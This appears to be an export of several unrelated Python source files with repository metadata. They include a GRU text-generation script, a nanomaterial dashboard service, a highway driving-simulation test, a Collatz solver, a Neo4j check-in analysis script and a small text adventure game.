LEARNING_RATE = float(os.environ.get("LEARNING_RATE", "0.001"))
VOCABULARY_SIZE = int(os.environ.get("VOCABULARY_SIZE", "3000"))
EMBEDDING_DIM = int(os.environ.get("EMBEDDING_DIM", "48"))
HIDDEN_DIM = int(os.environ.get("HIDDEN_DIM", "128"))
NEPOCH = int(os.environ.get("NEPOCH", "1000"))
MODEL_OUTPUT_FILE = os.environ.get("MODEL_OUTPUT_FILE")
INPUT_DATA_FILE = os.environ.get("INPUT_DATA_FILE", "./data/ciceroquotes.csv")
PRINT_EVERY = int(os.environ.get("PRINT_EVERY", "3000"))
if not MODEL_OUTPUT_FILE:
ts = datetime.now().strftime("%Y-%m-%d-%H-%M")
MODEL_OUTPUT_FILE = "GRU-%s-%s-%s-%s.dat" % (ts, VOCABULARY_SIZE, EMBEDDING_DIM, HIDDEN_DIM)
# compute the perplexity of a pre-loaded model
x_train, y_train, word_to_index, index_to_word = load_data(INPUT_DATA_FILE, VOCABULARY_SIZE)
model = load_model_parameters_theano('./data/gru-theano-2018-05-18-16-13-00.npz')
# print("here is your perplexity " + str(calc_perplexity(model,index_to_word,word_to_index)))
generate_sentences(model, 100, index_to_word, word_to_index)
# uncomment to train a new model
'''
# Load data
x_train, y_train, word_to_index, index_to_word = load_data(INPUT_DATA_FILE, VOCABULARY_SIZE)
# Build model
model = GRUTheano(VOCABULARY_SIZE, hidden_dim=HIDDEN_DIM, bptt_truncate=-1)
# Print SGD step time
t1 = time.time()
model.sgd_step(x_train[10], y_train[10], LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
sys.stdout.flush()
# We do this every few examples to understand what's going on
def sgd_callback(model, num_examples_seen):
global loss_lst
dt = datetime.now().isoformat()
loss = model.calculate_loss(x_train[:10000], y_train[:10000])
print("\n%s (%d)" % (dt, num_examples_seen))
print("--------------------------------------------------")
print("Loss: %f" % loss)
# generate_sentences(model, 10, index_to_word, word_to_index)
# save_model_parameters_theano(model, MODEL_OUTPUT_FILE)
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
save_model_parameters_theano(model,"./data/gru-theano-%s.npz" % (time))
print("\n")
loss_lst.append((num_examples_seen,loss))
with open("gru_losses.csv","wb") as f:
for num_examples,loss in loss_lst:
f.write("num_examples: " + str(num_examples) + " : loss: " + str(loss) + ",\n")
sys.stdout.flush()
loss_lst = []
for epoch in range(NEPOCH):
train_with_sgd(model, x_train, y_train, learning_rate=LEARNING_RATE, nepoch=1, decay=0.9,
callback_every=PRINT_EVERY, callback=sgd_callback)
'''
| [
"cjf92@cornell.edu"
] | cjf92@cornell.edu |
fb9705a0d1b4b5da9c80db0e6507fd386d90b160 | f28a261132fbf98f5ebfd004672af4155dfa1cc5 | /nanodash/service/dataset-description-nano-090.py | b6fd62ced21821aab7733a8570b3d22d64d38b3d | [
"Apache-2.0",
"MIT"
] | permissive | curtislisle/nanomaterial-dashboard | 8704779b7410747092c8fdb9326fb69b9f6b94ff | 06de2e0782f53ce56d6edd0937b14cbd738fc22a | refs/heads/master | 2021-01-21T04:41:16.713855 | 2016-07-08T01:07:17 | 2016-07-08T01:07:17 | 54,521,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #import bson
import pymongo
import json
from bson import ObjectId
from pymongo import MongoClient
import string
import tangelo
def run(ipaddress):
# Create an empty response object.
response = {}
response['datasource'] = 'remote'
response['file'] = "http://"+str(ipaddress)+":8080/nanodash/service/dataset-content-nano-090/NanoDB3/Nano_combined_0301"
response['name'] = "Nano Database Dashboard v0.9.0"
response['separator'] = ','
response['skip'] = 0
response['meta'] = [
{ "type": "id", "name": "NanomaterialID" },
{ "type": "string", "name": "Molecular Identity" },
{ "type": "string", "name": "Material Type" },
{ "type": "string", "name": "Molecular Type" },
{"type":"string","name":"Product Name"},
# {'name':'Mean Hydrodynamic Diameter','type':'float'},
{'name':'Mean Primary Particle Size','type':'float'},
# {'name':'Component Molecular Weight','type':'float'},
# {'name':'Molecular Weight','type':'float'},
{'name':'Lambda Max','type':'float'},
# {'name':'Bulk Density','type':'float'},
# {'name':'Primary Particle Size','type':'float'},
{'name':'Specific Surface Area','type':'float'},
{'name':'Zeta Potential','type':'float'}
]
response['sets'] = [
{ "format": "binary", "start": 1, "end": 5}]
response['setlist'] = ['2D Dimensionality','3D Dimensionality','Metal','Metal Oxide','Polymer','Carbohydrate',
'Protein','Nucleic Acid','Group Ii-Vi','Dendrimer','Lipid','Group Iv - Non C',
'Agglomerated','Aggregated','Positive Polarity','Negative Polarity','Purity99+','IsCrystalline',
'Aromatic','Macrocyclic','Sugar','VHQ-R subset', 'UHQ-R subset',
'source_pdf','source_nano_db']
#'Monoclinic','SingleCrystal','Polycrystalline','Amorphous','Anatase','Tetragonal','Rutile','Cubic','Brookite','Wurtzite','Zincite']
response['attributelist'] = []
response['author'] = 'ABCC IVG & KnowledgeVis'
response['description'] = 'Nanomaterial database v2'
response['source'] = "Nanomaterials reference database"
#tangelo.log(str(response))
return json.dumps(response)
| [
"clisle@knowledgevis.com"
] | clisle@knowledgevis.com |
e6aaf834c6ccd10cab9af9a5c349ed26c8c12144 | e43c92c0d0ac8b979801c17a1ef316d04cdc0e74 | /Train/0520_DQN23_run.py | d4746a9730d69f544223b406f54759b2e724a433 | [] | no_license | DengNanshan/DnsEnv | 86c358b835ec523931ba84accf5970eda2752f06 | 437727c7d5cdc023ab9c6bb58c8923e54a382176 | refs/heads/main | 2023-06-17T17:00:43.509283 | 2021-07-13T10:08:39 | 2021-07-13T10:08:39 | 366,282,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,533 | py | import gym
# import tkinter as tk
import highway_env
import matplotlib
from matplotlib import pyplot as plt
from stable_baselines.deepq.policies import MlpPolicy
from stable_baselines import DQN
import torch as th
from stable_baselines3.common.callbacks import EvalCallback, CallbackList,CheckpointCallback
import datetime
config = {
"observation": {
"type": "Kinematics",
"vehicles_count": 2, # !!!!!!!!!!!!
# "features": ["presence", "x", "y", "vx", "vy", "cos_h", "sin_h"],
"features": ["x", "y", "vx","vy"],
"features_range": {
"x": [-100, 100],
"y": [-10, 10],
"vx": [-30, 30],
"vy": [-30, 30],
},
"absolute": False,
"order": "sorted"
},
"action": {
"type": "DiscreteMetaAction",
},
"lanes_count": 2,
"initial_lane_id": None,
"vehicles_count": 5, # ! !!!!!!!!!!!
"controlled_vehicles": 1,
"duration": 50, # [step] # !!!!!!!!!!!!!!
"ego_spacing": 2,
"initial_spacing": 2,
"collision_reward": -1000, # The reward received when colliding with a vehicle.
"reward_speed_range": [0, 30], # [m/s] The reward for high speed is mapped linearly from this range to [0, HighwayEnv.HIGH_SPEED_REWARD].
"right_lane_reward": 0, # The reward received when driving on the right-most lanes, linearly mapped to
# zero for other lanes.
"high_speed_reward": 1, # The reward received when driving at full speed, linearly mapped to zero for
# lower speeds according to config["reward_speed_range"].
"simulation_frequency": 10, # [Hz]
"policy_frequency": 1, # [Hz]
"other_vehicles_type": "highway_env.vehicle.behavior.IDMVehicle",
"screen_width": 600, # [px]
"screen_height": 150, # [px]
"centering_position": [0.3, 0.5],
"scaling": 5.5,
"show_trajectories": False,
"render_agent": True,
"offscreen_rendering": False,
"vehicles_density": 1,
"offroad_terminal": False
}
env = gym.make('highway-v0')
env.configure(config)
env.reset()
#
#
# model= DQN(MlpPolicy,env,verbose=1,
# tensorboard_log="../../Data/tensorboard_log_fello/",
# exploration_fraction= 0.1,
# exploration_initial_eps = 1.0,
# exploration_final_eps= 0.05,
# learning_rate=0.01,
# learning_starts=100,
# gamma=0.9)
# timetemp=datetime.datetime.now().strftime("DQN23%Y_%m_%d_%H_%M_%S")
# checkpoint_callback=CheckpointCallback(save_freq=1000, save_path='../../Data/'+timetemp,name_prefix='deeq_highway_check')
# E=EvalCallback(eval_env=env,eval_freq=1000,log_path='../../Data/'+timetemp,best_model_save_path='../../Data/'+timetemp)
# callbacks=CallbackList([checkpoint_callback])
# # model.learn(300000,callback=callbacks)
# model.learn(300000)
# model.save('../../Data/DQN23')
#
# del model
'''
ACTIONS_ALL = {
0: 'LANE_LEFT',
1: 'IDLE',
2: 'LANE_RIGHT',
3: 'FASTER',
4: 'SLOWER'
}
'''
# model=DQN.load(('../../Data/DQN23'),env)
# obs=env.reset()
# i=0
# ve=[]
for i in range(1000):
# action, _state = model.predict(obs)
# action=int(action)
# print('action',action)
# print(action,_state)
# print(type(action))
obs,reward,dones,info=env.step(1)
print('reward',reward)
ego_speed=obs[0,1]*30
# ve.append(ego_speed)
f_speed=obs[1,1]*30+ego_speed
# print(ego_speed,f_speed)
# print(obs,reward,dones,info)
env.render()
| [
"374450833@qq.com"
] | 374450833@qq.com |
e173dd44edd47d50ac75298a2927da10f8cb5fc5 | a95236e2dccd588627c6f0a1542f37e26f6899f3 | /Chap04Functions/3-1-1.函数对象.py | a969ddb2ef7cb3670e7c3c086c3b5e4d44527a9f | [
"MIT"
] | permissive | royqh1979/programming_with_python | 43b1cf0ab1b6a54ad165e30991250cf7bf318bd6 | aa0603058f40b5bc7406e92c92134ee34f3b15e2 | refs/heads/master | 2023-06-11T02:11:59.590880 | 2023-05-29T06:39:03 | 2023-05-29T06:39:03 | 166,190,796 | 5 | 4 | MIT | 2023-02-15T23:13:33 | 2019-01-17T08:38:56 | Python | UTF-8 | Python | false | false | 70 | py | def fun1():
print("this is fun1")
print(fun1)
fun1=34
print(fun1) | [
"royqh1979@gmail.com"
] | royqh1979@gmail.com |
a7e5d71518933fffd99a1fd2d4e413d27c086d7f | 4cb06a6674d1dca463d5d9a5f471655d9b38c0a1 | /am5801/Assignment1/Problem1.py | 499514bdcc6f160059a3347a3ce4c3d82ccbbaf0 | [] | no_license | nyucusp/gx5003-fall2013 | 1fb98e603d27495704503954f06a800b90303b4b | b7c1e2ddb7540a995037db06ce7273bff30a56cd | refs/heads/master | 2021-01-23T07:03:52.834758 | 2013-12-26T23:52:55 | 2013-12-26T23:52:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | # Awais Malik
# Assignment 1
# Problem 1
import sys
first = int(sys.argv[1])
last = int(sys.argv[2])
# Function for creating 3n+1 chain and return length of chain
def collatz(n):
array = []
while n > 1:
array.append(n)
if n % 2 == 0:
n /= 2
else:
n *= 3
n += 1
if n == 1:
array.append(1)
return len(array)
elif n < 1:
print "Please type a positive integer!"
else:
print "Invalid input."
# Function to measure max length of chain in given range
def user_collatz(a, b):
max_length = collatz(a)
for i in range(a,b+1):
if max_length < collatz(i):
max_length = collatz(i)
print a, b, max_length
user_collatz(first, last) | [
"am5801@nyu.edu"
] | am5801@nyu.edu |
7c37d3fe89b357199a890b171f09627e3c643ac9 | 74176f2d4c18a9189714f8532bcac9b6ccd575dc | /verify70_30_v3.py | cd2d47a3923c7f0c2e05b5a3f705156798bcfc65 | [] | no_license | wsgan001/SocialInfluenceResearch | 9840f9aa28e7dcd32f041b6e47471251d6aa5457 | 73daf0f3d1ace4d4677b553712cd8e6648c61473 | refs/heads/master | 2020-03-09T15:31:10.191131 | 2015-02-18T08:06:39 | 2015-02-18T08:06:39 | 128,861,092 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,179 | py | from py2neo import Graph
from py2neo import Node, Relationship
import os
import itertools
from os import listdir
import json
import time
import cPickle as pickle
from copy import deepcopy
import sys
import re
import operator
import math
from random import shuffle
from py2neo.packages.httpstream import http
http.socket_timeout = 9999
datasetName = sys.argv[1]
def getMFLocation(uid):
if(datasetName == 'FB'):
locs = graph.cypher.execute("MATCH (n:User {id:{uid}})-[:VISITED]->(p:Place) RETURN p.id;", {"uid": uid})
elif(datasetName == 'FS'):
locs = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[:VISITED]->(p:FSPlace) RETURN p.id;", {"uid": uid})
elif(datasetName == 'GWL'):
locs = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[:VISITED]->(p:GWLPlace) RETURN p.id;", {"uid": uid})
elif(datasetName == 'CA'):
locs = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[:VISITED]->(p:CAPlace) RETURN p.id;", {"uid": uid})
locDic = {}
if(len(locs) == 0):
return False
for loc in locs:
lid = loc['p.id']
if(lid in locDic):
locDic[lid] = locDic[lid] + 1
else:
locDic[lid] = 0
sorted_dic = sorted(
locDic.items(), key=operator.itemgetter(1), reverse=True)
l = sorted_dic[0][0]
if(datasetName == 'FB'):
landl = graph.cypher.execute("MATCH (p:Place {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": l})
elif(datasetName == 'FS'):
landl = graph.cypher.execute("MATCH (p:FSPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": l})
elif(datasetName == 'GWL'):
landl = graph.cypher.execute("MATCH (p:GWLPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": l})
elif(datasetName == 'CA'):
landl = graph.cypher.execute("MATCH (p:CAPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": l})
for x in landl:
return x['p.latitude'], x['p.longitude']
def distance_on_unit_sphere(lat1, long1, lat2, long2):
degrees_to_radians = math.pi / 180.0
# phi = 90 - latitude
phi1 = (90.0 - lat1) * degrees_to_radians
phi2 = (90.0 - lat2) * degrees_to_radians
# theta = longitude
theta1 = long1 * degrees_to_radians
theta2 = long2 * degrees_to_radians
# Compute spherical distance from spherical coordinates.
# For two locations in spherical coordinates
# (1, theta, phi) and (1, theta, phi)
# cosine( arc length ) =
# sin phi sin phi' cos(theta-theta') + cos phi cos phi'
# distance = rho * arc length
cos = round((math.sin(phi1) * math.sin(phi2) * math.cos(theta1 - theta2) +
math.cos(phi1) * math.cos(phi2)), 10)
arc = math.acos(cos)
# Remember to multiply arc by the radius of the earth
# in your favorite set of units to get length.
return arc * 6373
# get top 10%
def getTop10User(dataset):
# if(dataset == ''):
# dirName = 'fb'
# elif(dataset == 'FS'):
# dirName = 'fs'
# elif(dataset == 'GWL'):
# dirName = 'gwl'
# elif(dataset == 'CA'):
# dirName = 'CA'
path = '/home/ytwen/observationData_follower_one/v2/' + datasetName
followDic = {}
disDic = {}
sumCount = []
timelist = []
dislist = []
for i in range(0, 100):
sumCount.append(0)
for followdata in listdir(path):
if (followdata == 'sumData.csv'):
continue
if ('.png' in followdata):
continue
if ('distance' in followdata):
continue
# print followdata
f = open(path + '/' + followdata)
followCount = 0
for line in f.readlines():
m = re.match('(.*)\,(.*)\,(\[.*\])\,(\[.*\])', line)
if m is not None:
if (int(m.group(1)) > 99):
break
sumCount[int(m.group(1))] = sumCount[
int(m.group(1))] + int(m.group(2))
followCount = followCount + int(m.group(2))
disdata = json.loads(m.group(3))
if(followCount > 0):
followDic[followdata] = int(followCount)
sorted_x = sorted(
followDic.items(), key=operator.itemgetter(1), reverse=True)
rangelimit = int(0.1 * len(sorted_x))
newlist = []
for i in xrange(rangelimit + 1):
newlist.append(sorted_x[i][0])
return newlist
def getPeriodmarker(uid):
if(datasetName == 'FB'):
q = graph.cypher.execute("MATCH (n:User {id:{uid}})-[r:VISITED]->(p:Place) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
elif(datasetName == 'FS'):
q = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[r:VISITED]->(p:FSPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
elif(datasetName == 'GWL'):
q = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[r:VISITED]->(p:GWLPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
elif(datasetName == 'CA'):
q = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[r:VISITED]->(p:CAPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
endTime = float(q[0]['max(r.atTime)'])
startTime = float(q[0]['min(r.atTime)'])
periodmarker = startTime+0.7*(endTime - startTime)
return periodmarker
def getGlobalPeriodmarker():
if(datasetName == 'FB'):
q = graph.cypher.execute("MATCH (n:User )-[r:VISITED]->(p:Place) RETURN max(r.atTime),min(r.atTime)")
elif(datasetName == 'FS'):
q = graph.cypher.execute("MATCH (n:FSUser)-[r:VISITED]->(p:FSPlace) RETURN max(r.atTime),min(r.atTime)")
elif(datasetName == 'GWL'):
q = graph.cypher.execute("MATCH (n:GWLUser)-[r:VISITED]->(p:GWLPlace) RETURN max(r.atTime),min(r.atTime)")
elif(datasetName == 'CA'):
q = graph.cypher.execute("MATCH (n:CAUser)-[r:VISITED]->(p:CAPlace) RETURN max(r.atTime),min(r.atTime)")
endTime = float(q[0]['max(r.atTime)'])
startTime = float(q[0]['min(r.atTime)'])
periodmarker = startTime+0.7*(endTime - startTime)
return periodmarker
def getAllUserCheckin(uid):
if(datasetName == 'FB'):
q = graph.cypher.execute("MATCH (n:User {id:{uid}})-[r:VISITED]->(p:Place) RETURN r.atTime,p.id;",{"uid":uid})
elif(datasetName == 'FS'):
q = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[r:VISITED]->(p:FSPlace) RETURN r.atTime,p.id;",{"uid":uid})
elif(datasetName == 'GWL'):
q = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[r:VISITED]->(p:GWLPlace) RETURN r.atTime,p.id;",{"uid":uid})
elif(datasetName == 'CA'):
q = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[r:VISITED]->(p:CAPlace) RETURN r.atTime,p.id;",{"uid":uid})
def randomSampleData(userfollowData,marker):
randomData = deepcopy(userfollowData)
shuffle(randomData)
trainSet = []
testSet = []
for i in xrange(int(marker)):
trainSet.append(randomData.pop())
testSet = randomData
return trainSet,testSet
def getPrecisionAndRecall(trainSet,testSet):
response = []
groundtruth = []
for fid in trainSet:
# fid = train['fid']
if fid not in response:
response.append(fid)
else:
continue
for fid in testSet:
# fid = test['fid']
if fid not in groundtruth:
groundtruth.append(fid)
else:
continue
postive = 0
print response,groundtruth
for fid in response:
if fid in groundtruth:
postive = postive + 1
else:
continue
precision = float(postive)/len(response)
recall = float(postive)/len(groundtruth)
return precision,recall
graph = Graph()
# print "# Start getting periodmarker"
# period_marker = getGlobalPeriodmarker
# print "# Get periodmarker:",str(period_marker)
print "###########################################"
print "# Start getting Top10Users"
users = getTop10User(datasetName)
print "# Get Top10Users"
print "###########################################"
print "# Start calculating following relationship"
results = []
dirName = datasetName
w = open('/home/ytwen/exp/PrecisionAndRecall_' + dirName + '.csv','w')
z = open('/home/ytwen/exp/followRecord_' + dirName ,'w')
blist=[]
for user in users:
userID = user.strip('.csv')
# mflocation = getMFLocation(userID)
# if(mflocation == False):
# continue
if(datasetName == 'FB'):
friends = graph.cypher.execute("MATCH (n:User {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'FS'):
friends = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'GWL'):
friends = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
elif(datasetName == 'CA'):
friends = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[:KNOWS]->(friend) RETURN friend.id;", {"uid": userID})
userfollowData = []
for friend in friends:
if(datasetName == 'FB'):
visitRecords = graph.cypher.execute("MATCH (n:User {id:{friendid}})-[r:VISITED]->(p:Place) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'FS'):
visitRecords = graph.cypher.execute("MATCH (n:FSUser {id:{friendid}})-[r:VISITED]->(p:FSPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'GWL'):
visitRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{friendid}})-[r:VISITED]->(p:GWLPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
elif(datasetName == 'CA'):
visitRecords = graph.cypher.execute("MATCH (n:CAUser {id:{friendid}})-[r:VISITED]->(p:CAPlace) RETURN p.category,p.id,r.atTime;", {"friendid": friend['friend.id']})
isVisit = {}
fid = str(friend['friend.id'])
pids = []
distances = []
days = []
categorys = []
visiteT = []
for record in visitRecords:
# check if p.id is followed
if(record['p.id'] in isVisit):
break
else:
isVisit[record['p.id']] = 1
# get all visit records by friend of p.id, ordered by time
if(datasetName == 'FB'):
totalRecords = graph.cypher.execute("MATCH (n:User {id:{friendid}})-[r:VISITED]->(p:Place {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'FS'):
totalRecords = graph.cypher.execute("MATCH (n:FSUser {id:{friendid}})-[r:VISITED]->(p:FSPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'GWL'):
totalRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{friendid}})-[r:VISITED]->(p:GWLPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
elif(datasetName == 'CA'):
totalRecords = graph.cypher.execute("MATCH (n:CAUser {id:{friendid}})-[r:VISITED]->(p:CAPlace {id:{pid}}) RETURN r.atTime ORDER BY r.atTime DESC;", {"friendid": friend['friend.id'], "pid": record['p.id']})
# get all visit records by user of p.id
if(datasetName == 'FB'):
userVisitRecords = graph.cypher.execute("MATCH (n:User {id:{userid}})-[r:VISITED]->(p:Place {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'FS'):
userVisitRecords = graph.cypher.execute("MATCH (n:FSUser {id:{userid}})-[r:VISITED]->(p:FSPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'GWL'):
userVisitRecords = graph.cypher.execute("MATCH (n:GWLUser {id:{userid}})-[r:VISITED]->(p:GWLPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
elif(datasetName == 'CA'):
userVisitRecords = graph.cypher.execute("MATCH (n:CAUser {id:{userid}})-[r:VISITED]->(p:CAPlace {id:{pid}}) RETURN r.atTime;", {"userid": userID, "pid": record['p.id']})
# get p.id catgory
if(datasetName == 'FB'):
q = graph.cypher.execute("MATCH (p:Place {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'FS'):
q = graph.cypher.execute("MATCH (p:FSPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'GWL'):
q = graph.cypher.execute("MATCH (p:GWLPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
elif(datasetName == 'CA'):
q = graph.cypher.execute("MATCH (p:CAPlace {id:{pid}}) RETURN p.category",{"pid": record['p.id']})
if (len(q) > 0):
cate = q[0]['p.category']
else:
cate = 'no category'
for userVisitRecord in userVisitRecords:
# get each user visit record time of p.id
userVisitTime = float(userVisitRecord['r.atTime'])
for totalR in totalRecords:
if(userVisitTime > float(totalR['r.atTime'])):
interval = int(float(userVisitTime)) - int(float(totalR['r.atTime']))
toDay = interval / 86400
# if(datasetName == ''):
# locData = graph.cypher.execute("MATCH (p:Place {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'FS'):
# locData = graph.cypher.execute("MATCH (p:FSPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'GWL'):
# locData = graph.cypher.execute("MATCH (p:GWLPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# elif(datasetName == 'CA'):
# locData = graph.cypher.execute("MATCH (p:CAPlace {id:{pid}}) RETURN p.latitude,p.longitude;", {"pid": record['p.id']})
# dis=distance_on_unit_sphere(float(mflocation[0]), float(mflocation[1]), float(locData[0]['p.latitude']), float(locData[0]['p.longitude']))
pids.append(record['p.id'])
# distances.append(dis)
days.append(toDay)
categorys.append(cate)
visiteT.append(userVisitTime)
#each following relationship record json format:
#fid = 123456
#pids = [1,2,3,4,5,6,7,8,9]
#days = [9,8,7,6,5,4,3,2,1]
#diss = [5,5,5,5,5,5,5,5,5]
#d = {'fid':fid,'pids':pids,'diss':diss,'days':days}
#alld = [], alled.append(d), json.dumps(alld)
userfollowData.append(fid)
break
c = len(pids)
# followData = {'fid':str(fid),'pid':pids,'dis':distances,'day':days,'category':categorys,'visited Time':visiteT,'count':c}
# followData = {'fid':str(fid),'count':c}
# if(c>0):
# userfollowData.append(followData)
# print userfollowData
userfollowDic = {}
for r in userfollowData:
if r not in userfollowDic:
userfollowDic[r] = 1
else:
userfollowDic[r] = userfollowDic[r] + 1
sorted_userfollowDic = sorted(userfollowDic.items(), key=operator.itemgetter(1), reverse=True)
alist = []
alist.append({'user':userID})
for item in sorted_userfollowDic:
a={'id':str(item[0]),'count':str(item[1])}
alist.append(a)
blist.append(alist)
# print len(userfollowData)
# print userfollowData
print "Finish calculating following relationship of user:",userID
print "###########################################"
marker = 0.7*len(userfollowData)
pandrList=[]
if len(userfollowData) >= 2:
for i in xrange(5):
print "Start sampling data into 70:30 and calculating Precision And Recall # ",i
newset = randomSampleData(userfollowData,marker)
trainSet = newset[0]
testSet = newset[1]
pandr = getPrecisionAndRecall(trainSet,testSet)
pandrList.append(pandr)
s = ''
for i in pandrList:
s = s + str(i[0]) + ',' + str(i[1])+ ','
w.write(str(userID) + ',' + s + '\n')
else:
print 'No following relationship of user:',userID
z.write(json.dumps(blist))
print "-------------------------------------------"
print "# Finish calculating following relationship"
print "###########################################"
w.close()
print "Finish saving result at:"+"/home/ytwen/exp/PrecisionAndRecall_" + dirName + ".csv"
| [
"moonorblue@gmail.com"
] | moonorblue@gmail.com |
bb32c9b355ff5984723a6f55c49c36cdbc32e17c | da280a226bbf15d7243410c0d3930bdca00d0088 | /firsttry/ex41.py | 0ba10ceba34cd4003844fa210c2ed0733881e028 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | from sys import exit
from random import randint
def death():
quips = ["You died. You kinda suck at this.", "Your mum would be proud, if she were smarter.", "Such a loser.", "I have a small puppy that's better at this."]
print quips[randint(0, len(quips)-1)]
exit(1)
def princess_lives_here():
print "You see a beautiful princess with a shiny crown."
print "She offers you some cake."
eat_it = raw_input("> ")
if eat_it == "eat it":
print "You explode like a pinata full of frogs."
print "The princess cackles and eats the frogs. Yum!"
return 'death'
elif eat_it == "do not eat it":
print "She throws the cake at you and it cuts off your head."
print "The last thing you see if her munching on your torso. Yum!"
return 'death'
elif eat_it == "make her eat it":
print "The princess screams as you cram the cake in her mouth."
print "The she smiles and cries and thanks you for saving her."
print "She points to a tiny door and says, 'The Koi needs cake too.'"
print "She gives you the very last bit of cake and shoves you in."
return 'gold_koi_pond'
else:
print "The princess looks at you confused and just points at the cake."
return 'princess_lives_here'
def gold_koi_pond():
print "There is a garden with a koi pond in the centre."
print "You walk close and see a massive fin poke out."
print "You peek in and a creepy looking huge Koi stares at you."
print "It opens its mouth waiting for food."
feed_it = raw_input("> ")
if feed_it == "feed it":
print "The Koi jumps up, and rather than eating the cake, eats your arm."
print "You fall in and the Koi shrugs then eats you."
print "You are then pooped out sometime later."
return 'death'
elif feed_it == "do not feed it":
print "The Koi grimaces, then thrashes around for a second."
print "If rushes to the other side of the pong, braces against the wall..."
print "The it *lunges* out of the water, up in the air and over your"
print "entire body, cake and all."
print "You are pooped out about a week later."
return 'death'
elif feed_it == "throw it in":
print "The Koi wiggles, then leaps into the air to eat the cake."
print "You can see it's happy, it gruts, thrashes..."
print "and finally rolls over and poops a magic diamond into the air."
print "It lands at your feet."
return 'bear_with_sword'
else:
print "The Koi gets annoyed and wiggles a bit."
return 'golden_koi_pond'
def bear_with_sword():
print "Puzzled, you are about to pick up the fish poop diamond when"
print "a bear bearing a load bearing sword walks in."
print "\"Hey, that's MY diamond! Where'd you get that!?\""
print "It holds its paw out and looks at you."
give_it = raw_input("> ")
if give_it == "give it":
print "The bear swipes at your hand to grab the diamond and"
print "rips your hand off in the process. It then looks at"
print "your bloody stump and says \"Oh crap, sorry about that.\""
print "It tries to put your hand back on, but you collapse."
print "The last thing you see is the bear shrug and eat you."
return 'death'
elif give_it == "say no":
print "The bear looks shocked. Nobody ever told a bear"
print "with a broadsword 'no'. It asks, "
print "\"Is it because it's not a katana? I could go get one!\""
print "It then runs off and you notice a big iron gate."
print "\"Where the hell did that come from?\" You say."
return 'big_iron_gate'
else:
print "The bear looks puzzled as to why you'd do that."
return 'bear_with_sword'
def big_iron_gate():
print "You walk up to the big iron gate and see there's a handle."
open_it = raw_input("> ")
if open_it == "open it":
print "You open it and you are free!"
print "There are mountains. And berries! And..."
print "Oh, but then the bear comes with his katana and stabs you."
print "\"Who's laughing now!? Love this katana.\""
return 'death'
else:
print "That doesn't seem sensible. I mean, the door's right there."
return 'big_iron_gate'
ROOMS = {'death': death, 'princess_lives_here': princess_lives_here, 'gold_koi_pond': gold_koi_pond, 'big_iron_gate': big_iron_gate, 'bear_with_sword': bear_with_sword}
def runner(map, start):
next = start
while True:
room = map[next]
print "\n--------"
next = room()
runner(ROOMS, 'princess_lives_here')
| [
"connor.collins@gmail.com"
] | connor.collins@gmail.com |
cd1da68ea2ca02203874dafaf7c014fc917f182e | 30e0dfc86f3593cbdd8d0366396b2bb7bf2943bd | /Functional features/DNSlogic.py | 478251c4d93583a70ff4a655d0f24081f062a731 | [
